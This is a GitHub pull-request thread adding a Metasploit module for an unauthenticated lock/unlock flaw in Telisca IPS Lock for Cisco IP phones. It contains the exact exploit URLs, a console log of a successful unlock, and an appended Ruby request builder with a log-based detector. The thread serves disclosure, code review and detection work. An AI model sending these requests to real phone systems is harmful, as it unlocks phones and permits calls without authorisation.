Add module Telisca IPS Lock/Unlock #6470
+ symantec_brightmail_ldapcreds.rb + telisca_ips_lock_abuse.rb
I see there are two modules in this pull request, and at first glance they look identical to me. Should there be two modules?
Hi, in this pull request there is just one module, "modules/auxiliary/scanner/voice/telisca_ips_lock_abuse.rb". When I created the branch I removed the other module ("remove symantec_brightmail_ldapcreds.rb").
@kfr-ma Ah ok. Well, I see modules/auxiliary/voip/telisca_ips_lock_abuse.rb in this pull request too, so perhaps you want to remove that one as well?
Yes, it is the same file, the same lines :)
@kfr-ma Ok. On your test_telisca_ipslock branch, please do:
And that should remove the unwanted module, and update the pull request. Thanks!
Ah, thank you. I could do that tomorrow morning, because I do not have my dev PC with me.
@kfr-ma No problem, take your time :-)
6fcac1a to 1b9563b: …_telisca_ipslock merge
Hi wchen-r7,
@kfr-ma yup that looks good now, thanks. BTW, how do I get IPS Lock 2? I am not seeing anything I can download from the vendor's website.
Ah, I found it installed during a pentest for a client, it is an
On Thursday 14 January 2016, sinn3r [email protected] wrote:
@kfr-ma Ok, gotcha. Do you still have access to this box? Will you lose it anytime soon? Because usually what happens is, if we can't verify it, we will have to ask for a pcap from you to prove the module is working. But before we do, we will have to review your code and maybe there will be code changes along the way. And obviously, the longer the code review, the more likely you won't be able to test the new changes. So I just would like to know how much time we have to work on this :-)
Hi
On Thursday 14 January 2016, sinn3r [email protected] wrote:
@kfr-ma Ok cool, thanks! Another question, do you know if this is a zero-day?
{
  'SSL' => false,
  'SSLVersion' => 'TLS1',
  'RPORT' => 80
You can remove all these defaults. SSL is false by default and since it is false, we don't need the SSLVersion as well. RPORT is registered by default to 80 in the HTTPClient mixin. Reference is 3752c10
res = lock(phone_name,ipsserver)
when 'UNLOCK'
  print_good "Try to unlock "
  res = unlock(phone_name,ipsserver)
Since res is not used anywhere, it should be removed.
@kfr-ma The indentation is not consistent. You should use two space soft indentation throughout the module. I can see in certain places you have used two space indentation while there are places where a single indentation is used as well. Reference https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards
Hi Sinn3r, yes, it is a zero-day, I just informed the vendor today. Regards. 2016-01-14 1:43 GMT+00:00 sinn3r [email protected]:
cleaning the code
Hi void-in;
  'zirsalem'
], 'License' => MSF_LICENSE,
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 17 2015",
What does this date refer to? Is this disclosed to the vendor?
Hi
This is the date of the vulnerability discovery. I alerted the vendor just today
and they confirmed the vulnerability.
Regards.
2016-01-14 17:03 GMT+00:00 Brent Cook [email protected]:
In modules/auxiliary/voip/telisca_ips_lock_abuse.rb:
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Telisca IPSLock Abuse',
      'Description' => %q{This modules will exploit the vulnerabilities of Telisca IPSLock , in order to lock/unlock IP Phones. you need to be in the voip vlan and you have to know the phone name example : SEP002497AB1D4B . Set ACTION to either LOCK or UNLOCK UNLOCK is the default.},
      'References' =>
        [
        ],
      'Author' =>
        [
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
          'zirsalem'
        ], 'License' => MSF_LICENSE,
      'License' => MSF_LICENSE,
      'DisclosureDate' => "Dec 17 2015",
What does this date refer to? Is this disclosed to the vendor?
Mainly making sure it is following the Ruby style guide, and avoiding unrecommended coding practices.
@kfr-ma I have submitted a pull request to update the module, could you please take a look? kfr-ma#2 If the updated module works fine, there should be a green button that says "Merge pull request". That will apply/merge the new code changes to your branch, as well as updating this pull request. Thanks.
Update Telisca IPS Lock Control module
commit the changes made by sinn3r and replace headers on lock and unlock
This is the pcap file which proves that the code works
@kfr-ma Thank you, I got the pcap. I think this module is good to go. However, since this is a zero-day, we will have to delay releasing to master until the vendor has released a patch. Will you please let us know when that happens? Thanks!
ok wchen-r7,
thank you!
A LOT OF YOU GUYS DON'T SEEM TO UNDERSTAND 'THE INTERNET' OR WHAT '0-day' MEANS...
Barring any complaints from @kfr-ma, this module is good to go. There's no need to wait for a patch. @kfr-ma, is the disclosure date of December 17, 2015 correct? That predates this PR by a few weeks, and conflicts with this comment that indicates disclosure actually happened on January 12, 2016. Just looking for a 👍 on accuracy there. If that's correct, I believe I can land, unless you stop me. I know @wchen-r7 is much more offline this week than usual.
Hi Tod
On Tuesday 26 January 2016, Tod Beardsley [email protected] wrote:
Landing this now with some overhauled title and description that more clearly describes the module.
Oh, I took out the
thanks guys, it was a pleasure working with you :) 2016-01-27 22:43 GMT+00:00 Tod Beardsley [email protected]:
Telisca IPS Lock (IPS Lock is an XML application for Cisco IP Phones which permits locking
the telephone and preventing any unauthorized calls.
http://www.telisca.com/ips-lock-2/) suffers from a vulnerability that allows any
attacker to lock/unlock IP phones without knowing the PIN code. The attacker
just has to make an HTTP request to the IPS Lock server with the MAC address of the phone:
For example, to lock the IP phone SEP27745DA145D2:
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=
For example, to unlock the IP phone SEP27745DA145D2:
http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=
resource (telisco.rb)> use modules/auxiliary/voip/telisca_ips_lock_abuse.rb
resource (telisco.rb)> set PHONENAME SEP27745DA145D2
PHONENAME=> SEPC80084ED0DBD
resource (telisco.rb)> set RHOST 10.16.40.18
RHOST => 10.16.40.18
resource (telisco.rb)> set VHOST 10.16.40.18
VHOST => 10.16.40.18
resource (telisco.rb)> set ACTION UNLOCK
ACTION => UNLOCK
resource (telisco.rb)> run
[+] Try to unlock
[+] Deivice SEP27745DA145D2 successfully unlocked
[*] Auxiliary module execution completed
msf auxiliary(telisca_ips_lock_abuse) >
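The two request shapes above, together with the check a defender would run over web-server access records, as an added Ruby example: this is not the PR's module and not Telisca's or Rapid7's code. `request_uri` builds the lock and unlock URLs exactly as the PR text shows them (note that nothing in either request carries a credential or PIN, which is the whole bug), and `classify`/`scan_log` flag such requests in access-log style records. Assumptions: phone names are `SEP` followed by a 12-hex-digit MAC, the only form that appears on this page; the log lines are constructed here in a simplified `client-ip method uri-stem uri-query status` layout, not a real IIS log; and path and query-parameter names are compared case-insensitively, because IIS resolves paths and ASP.NET reads `Request.QueryString` names without regard to case, so a plain substring signature on `action=DO&tg=L` would miss `ACTION=do&TG=l`.

```ruby
require 'uri'

# Added example: builds the Telisca IPS Lock lock/unlock requests described in
# the PR text and detects them in access-log style records. Not the module's
# own code. Assumption: phone names are "SEP" + 12 hex MAC digits.
module TeliscaIpsLock
  PATH = '/IPSPCFG/user/Default.aspx'.freeze
  PHONE_NAME_RE = /\ASEP[0-9A-F]{12}\z/i

  # Parameter layouts taken from the two example URLs; nil marks the phone slot.
  LOCK_PARAMS   = [['action', 'DO'], ['tg', 'L'], ['pn', nil], ['dp', ''], ['gr', ''], ['gl', '']].freeze
  UNLOCK_PARAMS = [['action', 'U7LCK'], ['pn', nil], ['dp', '']].freeze

  def self.valid_phone_name?(name)
    name.is_a?(String) && PHONE_NAME_RE.match?(name)
  end

  # Request-URI for locking (:lock) or unlocking (:unlock) one phone.
  # No credential or PIN is needed anywhere in this request; that is the bug.
  def self.request_uri(action, phone_name)
    raise ArgumentError, "bad phone name: #{phone_name.inspect}" unless valid_phone_name?(phone_name)
    template = { lock: LOCK_PARAMS, unlock: UNLOCK_PARAMS }.fetch(action) do
      raise ArgumentError, "action must be :lock or :unlock, got #{action.inspect}"
    end
    pairs = template.map { |key, value| [key, key == 'pn' ? phone_name.upcase : value] }
    "#{PATH}?#{URI.encode_www_form(pairs)}"
  end

  # Classify one request as a lock/unlock attempt ({action:, phone:}) or nil.
  # IIS matches the path case-insensitively and ASP.NET reads query parameter
  # names case-insensitively, so both are normalised before comparing.
  def self.classify(method, path, query)
    return nil unless %w[GET POST].include?(method.to_s.upcase)
    return nil unless path.to_s.casecmp?(PATH)
    query = '' if query.nil? || query == '-'            # IIS writes "-" for an empty query
    params = URI.decode_www_form(query).each_with_object({}) { |(k, v), h| h[k.downcase] = v }
    phone = params['pn'].to_s.upcase
    return nil unless valid_phone_name?(phone)
    case params['action'].to_s.upcase
    when 'DO'    then params['tg'].to_s.upcase == 'L' ? { action: :lock, phone: phone } : nil
    when 'U7LCK' then { action: :unlock, phone: phone }
    end
  end

  # Constructed sample records (not from any real server) in a simplified
  # "client-ip method uri-stem uri-query status" layout; adapt the split to
  # the field order of your own IIS W3C log.
  SAMPLE_LOG = [
    '10.16.40.5 GET /IPSPCFG/user/Default.aspx action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl= 200',
    '10.16.40.5 GET /IPSPCFG/user/Default.aspx action=U7LCK&pn=SEP27745DA145D2&dp= 200',
    '10.16.40.9 GET /ipspcfg/user/default.aspx ACTION=u7lck&PN=sep88908d68c5d4&dp= 200',
    '10.16.40.7 GET /IPSPCFG/user/Default.aspx - 200',
    '10.16.40.7 GET /IPSPCFG/user/Default.aspx action=DO&tg=L&pn=NOTAPHONE&dp= 200'
  ].freeze

  # Returns one hash per lock/unlock request found in the records.
  def self.scan_log(lines)
    lines.map do |line|
      client, method, stem, query, status = line.split
      next unless status                                # skip malformed records
      hit = classify(method, stem, query)
      hit && hit.merge(client: client, status: status.to_i)
    end.compact
  end
end

if $PROGRAM_NAME == __FILE__
  puts TeliscaIpsLock.request_uri(:lock, 'SEP27745DA145D2')
  puts TeliscaIpsLock.request_uri(:unlock, 'SEP27745DA145D2')
  TeliscaIpsLock.scan_log(TeliscaIpsLock::SAMPLE_LOG).each { |hit| puts hit.inspect }
end
```

Of the five constructed records, only the first three are reported: the mixed-case third line is still caught because of the normalisation, the fourth has no query, and the fifth carries a `pn` value that is not a phone name. Any 200 on this path from an address that is not the CUCM or the phones' own VLAN is worth an alert, since the request needs no authentication to succeed.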